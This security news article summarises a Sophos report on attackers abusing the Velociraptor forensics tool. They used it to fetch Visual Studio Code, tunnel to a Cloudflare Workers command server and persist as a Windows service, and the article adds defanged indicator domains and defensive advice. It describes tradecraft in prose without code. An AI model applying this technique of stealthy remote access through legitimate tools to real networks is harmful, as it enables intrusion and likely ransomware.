Researchers from the Counter Threat Unit (CTU) at Sophos uncovered a sophisticated intrusion where threat actors repurposed the legitimate open-source Velociraptor digital forensics and incident response (DFIR) tool to establish unauthorized remote access within targeted networks.
Velociraptor, designed for endpoint visibility and forensic analysis, was deployed maliciously to download and execute Visual Studio Code, facilitating a tunneling mechanism that connected to an attacker-controlled command and control (C2) server.
This tactic allowed potential remote access and code execution, a method previously exploited by various threat groups.
Tactics Employed
The intrusion began with the Windows msiexec utility fetching an installer file named v2.msi from a Cloudflare Workers domain, specifically files[.]qaubctgg[.]workers[.]dev, which served as a staging repository for attacker tools including Cloudflare tunneling utilities and the Radmin remote administration tool.
Once installed, Velociraptor was configured to communicate with the C2 domain velo[.]qaubctgg[.]workers[.]dev.
The attackers then executed an encoded PowerShell command to retrieve Visual Studio Code (code.exe) from the same staging location, launching it with tunneling enabled.
To maintain persistence, code.exe was installed as a Windows service, with its output redirected to a log file for monitoring.
Subsequently, msiexec was invoked again to download additional malware via sc.msi from the workers[.]dev infrastructure.
This sequence formed a process tree where Velociraptor acted as the parent process spawning the Visual Studio Code tunnel, as observed in forensic analysis.
The tunneling activity triggered an alert in the Taegis security platform, prompting a rapid Sophos investigation that provided mitigation guidance, including host isolation, ultimately thwarting the attackers’ objectives and preventing likely ransomware deployment.
Broader Implications
This incident highlights a growing trend among threat actors who abuse remote monitoring and management (RMM) tools, including incident response utilities like Velociraptor, to minimize detectable malware footprints and pivot within compromised environments.
Unlike traditional attacks that deploy bespoke malware, this approach leverages preexisting or newly introduced legitimate tools such as exploiting vulnerabilities in systems like SimpleHelp or deploying tools during active intrusions to achieve persistence and exfiltration.
According to the report, CTU analysis indicates that unauthorized Velociraptor usage often serves as a precursor to ransomware, emphasizing the need for vigilant monitoring of unexpected tool deployments and anomalous behaviors like unusual tunneling or service installations.
Organizations can enhance defenses by implementing endpoint detection and response (EDR) systems to scrutinize process trees, network communications, and file downloads from suspicious domains.
Best practices include restricting access to known malicious indicators, enforcing least-privilege principles, and maintaining robust backup strategies to reduce attack impacts.
Sophos detections such as Troj/Agent-BLMR, Troj/BatDl-PL, and Troj/Mdrop-KDK specifically identify related threats, enabling proactive blocking.
By treating observations of this tradecraft as high-priority alerts and investigating them promptly, enterprises can disrupt attack chains before escalation to data encryption or exfiltration.
Indicators of Compromise (IOCs)
| Indicator | Type | Context |
|---|---|---|
| files[.]qaubctgg[.]workers[.]dev | Domain name | Hosted tools used in August 2025 Velociraptor campaign |
| velo[.]qaubctgg[.]workers[.]dev | Domain name | C2 server used in August 2025 Velociraptor campaign |
Find this News Interesting! Follow us on Google News, LinkedIn, and X to Get Instant Updates!
Source link
